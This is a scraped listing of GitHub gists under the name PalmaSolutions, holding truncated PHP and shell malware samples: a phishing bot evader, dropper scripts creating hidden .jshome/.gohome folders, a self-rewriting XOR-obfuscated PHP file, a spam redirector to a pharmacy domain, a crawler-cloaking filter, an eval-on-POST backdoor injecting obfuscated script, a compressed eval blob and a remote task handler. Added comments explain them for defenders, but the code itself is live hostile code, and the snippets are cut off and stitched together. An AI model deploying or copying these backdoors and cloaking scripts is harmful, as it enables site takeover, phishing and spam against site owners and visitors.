
Palma Solutions LTD PalmaSolutions

@PalmaSolutions
PalmaSolutions / evader-main.php
Created July 22, 2017 10:20
Bot evader for phishing
<?php
/*
_____ _ _ ______ __ __ ___
/ ____| | | | | |___ / /_ | /_ | / _ \
| (___ | |__ __ _ __| | ___ __ __ / / | | | | | (_) |
\___ \ | '_ \ / _` | / _` | / _ \ \ \ /\ / / / / - | | - | | - > _ <
____) | | | | | | (_| | | (_| | | (_) | \ V V / / /__ - | | - | | - | (_) |
|_____/ |_| |_| \__,_| \__,_| \___/ \_/\_/ /_____| |_| |_| \___/
#=======================#
@PalmaSolutions
PalmaSolutions / node-js-malware.sh
Created July 21, 2017 11:29
malware built around node.js
#!/bin/sh
# Opening lines of a dropper sample; the listing cuts it off inside the `if` below,
# so the download/execute stage is not visible here.
# The directory name is relative and starts with a dot, so it is created under
# whatever the current directory is and hidden from a plain `ls`. An unexpected
# `.jshome` directory is a host indicator worth hunting for.
DIRNAME='.jshome'
# Stores the CPU architecture string. Its use is outside this excerpt
# (presumably selects an architecture-specific payload; confirm against the full sample).
MACHINE_TYPE=`uname -m`
mkdir $DIRNAME
cd $DIRNAME
# $? is the exit status of `cd`, not of `mkdir`: the script stops if it could
# not enter the directory.
if [ $? != 0 ];
then
echo 'exiting'
exit
#!/bin/bash
# Opening lines of a second dropper sample with the same preamble as the `.jshome`
# one; the listing cuts it off inside the `if` below.
# The directory name is relative and dot-prefixed, so it is hidden from a plain `ls`.
# An unexpected `.gohome` directory is a host indicator worth hunting for.
DIRNAME='.gohome'
# Stores the CPU architecture string. Its use is outside this excerpt
# (presumably selects an architecture-specific payload; confirm against the full sample).
MACHINE_TYPE=`uname -m`
mkdir $DIRNAME
cd $DIRNAME
# $? is the exit status of `cd`, not of `mkdir`: the script stops if it could
# not enter the directory.
if [ $? != 0 ];
then
echo 'exiting'
exit
<?php
// Self-rewriting script. readFile2() and writeFile2() open __FILE__ for reading and
// for writing, so the file edits its own source at runtime. For defenders: the hash of
// this file is not stable, and a web-served PHP file that stays writable by the
// web-server account and changes on disk is a finding for file-integrity monitoring.
//
// The variable assigned right after the marker line holds base64 text. dec2()
// base64-decodes it and XORs it byte-for-byte with the fixed key embedded in xor_enc2(),
// so the stored value can be recovered offline from a copy of the file without running it.
// xor_enc2() reads $key[$i] without wrapping; input longer than the key would index past
// the end of the key.
//
// change_url2() searches the file for a line that is exactly the marker comment below,
// which makes that comment functional rather than documentation. The rest of
// change_url2() is cut off in this listing; presumably it replaces the assignment that
// follows the marker (confirm against the full file).
// NEXT LINE
$sfnusdihfudsksds = "MDA/GkpcaQQnG1ACQlQrRjARZRZaJF8KNFUaBxs0IwtE";
function readFile2(){$fname=__FILE__;$fp=fopen($fname,'rb');if(!$fp){die("reading\n");}$data=fread($fp,filesize($fname));fclose($fp);return $data;}function writeFile2($data){$fname=__FILE__;$fp=fopen($fname,'wb');if(!$fp){die("writing\n");}fwrite($fp,$data);fclose($fp);}function xor_enc2($str){$key='XDKjpsFmTw1ql7DhEzJu5H3oS05nvUDnkT1OxC32N2S4wTlDMjnBzYnogzO0CbOz0sKoJtqXokF2cAKAwe9VTrz5ldlhcB3EyuQeAQf2Hpv7sxFS7DwS3U03cQl3KIG1uLTytQqgHC44AgGYM50mmTkHogtg7hbSMBWcu5KhAtOHnNfwHC2gapDWjfxVceOJufeN4zaA';$res='';for($i=0;$i<strlen($str);$i++){$res.=chr(ord($str[$i])^ord($key[$i]));}return $res;}function enc2($str){$res=xor_enc2($str);$res=base64_encode($res);return $res;}function dec2($str){$str=base64_decode($str);$res=xor_enc2($str);return $res;}function change_url2($new_url){$str=readFile2();$arr=preg_split("/\r\n|\n|\r/",$str);$change=false;$new_str='';foreach($arr as $line){if($line==='// NEXT LINE'){$new_str.=$line."\n";$cha
@PalmaSolutions
PalmaSolutions / badass-redirect.php
Created July 14, 2017 12:19
Checks Safebrowsing and SpamHaus for blacklists, then goes to Viagra page
<?if($_GET['mod']){if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){$g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
// Spam redirector with a built-in reputation self-check. When the `mod` query parameter
// is present, the script looks up the host name from the request's Host header and
// reports the result only through the HTTP status line (201, 202 or 203), then exits.
// mod=0XX runs the Safe Browsing lookup above, mod=X0X runs the Spamhaus lookup below,
// and mod=00X runs both. The Host value is client-supplied and is concatenated into the
// lookup URL and the DNS name without encoding or validation.
// Next line: 202 is sent when the fetched page contained the token "listed"
// (str_replace() reports a non-zero replacement count in $g_out).
$g_sch = str_replace('"listed"', '', $g_sch, $g_out);if($g_out){header('HTTP/1.1 202');exit;}}if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){$sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
// 203 is sent when the DBL query resolves to one of the return codes enumerated below.
if($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
// 201 is sent when no selected check matched.
header('HTTP/1.1 203');exit;}}header('HTTP/1.1 201');exit;}
// Without `mod`, every request gets a permanent redirect to the hard-coded destination.
// Detection pointers: GET requests carrying mod=0XX, mod=X0X or mod=00X; 201/202/203
// answers to plain GET requests; a web server that itself fetches the Safe Browsing
// diagnostic URL or resolves names under dbl.spamhaus.org.
header('HTTP/1.1 301 Moved Permanently');header('Location: http://rx-wallmart.su');
?>
<?php
// Generator stub: it assembles PHP source inside the single-quoted string $code.
// The listing cuts off inside that literal, so what happens to $code (written to disk,
// evaluated, or something else) is not visible here.
// The embedded source opens a list of regexes matching crawler, site-copier and
// link-checker User-Agent strings. That is the usual shape of cloaking, where automated
// visitors are treated differently from human ones (presumed; the filtering logic itself
// is outside this excerpt). The same pattern list is usable as a hunting signature for
// this kit in web roots.
// $scriptname is the request's SCRIPT_NAME with every "/" removed.
$scriptname= str_replace("/", "", $_SERVER["SCRIPT_NAME"]);
$code = '
<?php
$user_agent_to_filter = array( \'#Ask\s*Jeeves#i\', \'#HP\s*Web\s*PrintSmart#i\', \'#HTTrack#i\', \'#IDBot#i\', \'#Indy\s*Library#\',
\'#ListChecker#i\', \'#MSIECrawler#i\', \'#NetCache#i\', \'#Nutch#i\', \'#RPT-HTTPClient#i\',
\'#rulinki\.ru#i\', \'#Twiceler#i\', \'#WebAlta#i\', \'#Webster\s*Pro#i\',\'#www\.cys\.ru#i\',
\'#Wysigot#i\', \'#Yahoo!\s*Slurp#i\', \'#Yeti#i\', \'#Accoona#i\', \'#CazoodleBot#i\',
<?php /*
 * Injected backdoor plus page-tampering filter (the listing cuts this line off mid-pattern).
 *
 * eval($_POST['tmp_lkojfghx3']) runs whatever PHP arrives in that POST field, with no
 * authentication check anywhere in the visible code. Any file containing this line is a
 * remote code execution backdoor and the host should be handled as compromised.
 *
 * TMP_XHGFJOKL is defined as base64-decoded markup that starts with a script tag, i.e.
 * an obfuscated JavaScript block kept ready for insertion.
 *
 * tmp_lkojfghx($s) inflates the buffer when it starts with the gzip magic bytes (31, 139),
 * then removes existing script blocks longer than five lines that look obfuscated: a
 * quoted run of 30+ characters or 20+ comma-separated numbers, combined with eval,
 * fromCharCode or document.write. The remainder is not visible; presumably it inserts the
 * script held in TMP_XHGFJOKL into the page (confirm against the full sample).
 *
 * Hunting strings taken from this line: function name tmp_lkojfghx, POST field
 * tmp_lkojfghx3, constant TMP_XHGFJOKL, and the eval-on-POST construct itself.
 */ if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN0VOY3JnZmk3RU5wdCUyMDRMT3M0NXJLdUVjWmpmJTNEJTJGN0VOJTJGNDU5NFpqZiUyRTJnZjRuRks3WmpmJTJFWmpmMiUyRTE5WmpmNVpqZiUyRmpxdTdFTmVyeTQ1JTJFYTNqYTNzS3VFJTNFJTNDa2o2JTJGS3VFc1pqZmNLdUVyaXB0JTNFJykucmVwbGFjZSgvNExPfDQ1fGtqNnxnZnw3RU58WmpmfG5GS3xhM3xLdUUvZywiIikpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.
<?php eval(gzuncompress("x⁄ÖTmoõH˛+.Br€™ù¶A{âï–\x24RkßüT•¬Î°Ï≥dwQE˛ÔùÂ≈v¨Kè/0≥œº<œÃ¬RõI\x09 6„ªŸ}Ù`)ê*N¨Œ——,¿yöÒC¸Ò!Œá'¶¸\x0d¡E,†‰B±‚ß=p|ÛQíJ‰K†|\x09òˇ>ˇ\x09¬ÎÎ<ø≈˜Qx;Ω∆:æπ‰’\x222MX','ãD¬…(Ó\x22•„≥‘ñJî\x5c⁄\x0d»µ.,áí&πÁÂç»⁄ª´0Ù7-˚Ç‚\x0bºÉu©ûwù7Qt_~ä/g”ipaøÒÌù°•1YI˛á™`s5∂”∏” \x0cæÃ¢ û\x5c]Ö(¡˘\x1bgñÖW\x099ÏÙ+Œ—ä'◊¡4“9ˆ(˝¶S˛ªäÒ±çL©Ú¨flûéΩ·¯£˜˛É7Ù)•‘2ˆK¡`]∞ïWfÂ9r0<d‚GçÇh’ËX.j≥mlÕ*iDm˝N…Ñm}Ê4QågΩ∂˛íÅ‚´eŒVêV £|›?O»hx2>˝pDâ>∂?≠\x0a™√zÿΩm\x22YUO∑íuLy°‡I≈-v\x22DÚl[∫ÇE˛n-≈÷¿+Ö鱄8æ\x00Uâ¢ó≤‚ü†öÖíuv∑^,Wóp¸Õ~q¨.9]πf∆•rÕ2Qôk>V û±#≤‰ÖÇ2ße•ì’`„:àz(äF{∆9~’û—ÎÈıáfi‡ª¯^ûqÉYœ4Tߘå÷;°JÙ˜è[O)[_E‘«ˇï!7€ÃY\x24Eañm7£¡«gØ[葉Is.°A·µ¡ÎF∫[◊a›˝;æ≤Z r¶Éˇu*o˝ZÓFôä_1+òj|~m„µ·%zhÊ^Œ√œ≥ª(æ\x09&WAÿ\x0cËmTDÛpÖìÈ˝'D+Q˝›~\x09fÛ»7î™\x5c5›¿P\x0dl#[u¥Ω£Ö‡CR+\x5c‰£óÀ6í<Áøbù%Â%†xÑ\x0cùóv∑;›˝24nH DH–1Ì!Ê´GC.R˝“yÏ˙`È·[?‹”Åk‚ø∏‡ı\x0bGÇúˆÀl∑˜uXgÍ˝‹3Î%’ˇË∫-,—Eiòƒı∂∂S≥^◊Ÿ⁄l~˜!-Ü"));
<?php
// Remote task handler; the listing cuts it off right after error_reporting(), so what the
// `task` branch does is not visible here.
// First branch: when both POST fields are present it prints their product and exits.
// It has no other effect, so it presumably serves as a liveness probe that lets a remote
// caller confirm the file is reachable and executing PHP (inferred from the field names).
// Detection pointer: POST requests carrying test_a/test_b or task fields to a PHP file
// that is not part of the deployed application.
if (isset($_POST['test_a']) && isset($_POST['test_b']))
{
echo $_POST['test_a'] * $_POST['test_b'];
exit;
}
// Second branch: entered whenever a `task` POST field is present. No authentication
// check precedes it in the visible code.
if (isset($_POST['task']))
{
error_reporting(E_ALL);
<?php
/**
* @package Libraries
* *********************************************************************
* @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE
*/